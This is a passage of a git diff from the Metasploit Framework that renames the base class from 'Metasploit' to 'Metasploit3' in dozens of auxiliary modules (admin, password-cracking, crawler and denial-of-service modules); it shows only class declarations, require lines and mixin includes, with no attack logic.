Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index 1d6ac8631c..97b3bfb1e5 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 74d8948453..09bd23daf3 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 8757549492..4b15e11364 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index 8d1a32916e..e857b9eb34 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index 9ad5a1d497..f179f7ef4c 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index d9b7e46002..106dbfba96 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index b0866489fc..77e2f3a893 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index 32cb3778cf..dceb166244 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index 89830d7615..f02adcbf4d 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 3a84c340e4..52969f35b0 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index 67fc862c82..e1137d8945 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index d98495a35a..c519ea2b43 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 2c5b22a109..45980b7cbe 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index 8d54ea1d01..246a7c9cb1 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index d12c3a13ca..e41d6ff806 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index d7b9e4541d..5b0053951b 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary #Included to grab the john.pot and use some utiltiy functions include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index 1165b35155..d63e805904 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 388ed4738a..4757cbae8e 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 637aeace4e..9e6831e2f3 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # # This module sends email messages via smtp diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 0a63d51068..7eb6ab4a4b 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -17,7 +17,7 @@ require 'rinda/tuplespace' require 'pathname' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 71d6efe9a2..5c047d181f 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index a3032b38a0..ff25f23634 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index 3c824613df..f9b0933648 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index 7b9393cb18..cef333391d 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index cbe34139af..11029de675 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 0b377b51a7..99218cc07b 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index 98fd776452..ae5709b7d7 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index 35e94bc890..da932d94c9 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 6d1c97d3e9..4855af2930 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index a5fdeab765..0974305d95 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb index 41e0ac09fa..f13ad89ffe 100644 --- a/modules/auxiliary/dos/http/canon_wireless_printer.rb +++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 5fab922f81..6f13cb2ca0 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index 4fb9a5e09f..cdc449f22d 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/gzip_bomb_dos.rb b/modules/auxiliary/dos/http/gzip_bomb_dos.rb index ae0d08fdd3..a96f05e1b4 100644 --- a/modules/auxiliary/dos/http/gzip_bomb_dos.rb +++ b/modules/auxiliary/dos/http/gzip_bomb_dos.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' require 'stringio' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index 330dd6b1f6..59d7e7370a 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/monkey_headers.rb b/modules/auxiliary/dos/http/monkey_headers.rb index 92898bc469..2f6c097029 100644 --- a/modules/auxiliary/dos/http/monkey_headers.rb +++ b/modules/auxiliary/dos/http/monkey_headers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 950d0dcfa4..165a9d582e 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Watch out, dos all the things include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/http/nodejs_pipelining.rb b/modules/auxiliary/dos/http/nodejs_pipelining.rb index 83a586a972..9f3181a0aa 100644 --- a/modules/auxiliary/dos/http/nodejs_pipelining.rb +++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index de8126354c..cca21add81 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb index 10ace3da09..92c685a1aa 100644 --- a/modules/auxiliary/dos/http/rails_action_view.rb +++ b/modules/auxiliary/dos/http/rails_action_view.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 07faceacea..3fb0da5c57 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index cc8745d1d9..e90f6bec2d 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok. diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index c15d483f04..4329b358db 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index c051db4f45..8f9e60c3ff 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 0d9161face..1567e9536f 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index f36d4d08c9..4cf177b852 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index bbf9330a6e..fbe1395df8 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb index f6783cd9b0..f120cc3aa2 100644 --- a/modules/auxiliary/dos/misc/memcached.rb +++ b/modules/auxiliary/dos/misc/memcached.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 3117dfcc39..73a64cd658 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index e8c9713c37..949a673013 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index f36531c284..ec88b8823a 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index ed96a9ad14..34a5af994f 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb index f41d15ec32..a550c617b1 100644 --- a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb +++ b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/struct2' require 'rex/proto/smb' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 17b0ac5634..10cfb38841 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 390e13d801..76e35d1b59 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -17,7 +17,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/scada/igss9_dataserver.rb b/modules/auxiliary/dos/scada/igss9_dataserver.rb index f8b3cdddca..a97481a1af 100644 --- a/modules/auxiliary/dos/scada/igss9_dataserver.rb +++ b/modules/auxiliary/dos/scada/igss9_dataserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 39fe1cc089..4149967eaf 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 2431395492..86fc52f7f2 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index fdb9d07e77..3ec73403ae 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index ad1d2bce4d..2dddf9a25f 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb index df91d94da2..78ad298e42 100644 --- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb +++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos include Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index 36c56104f9..c9704300cb 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < 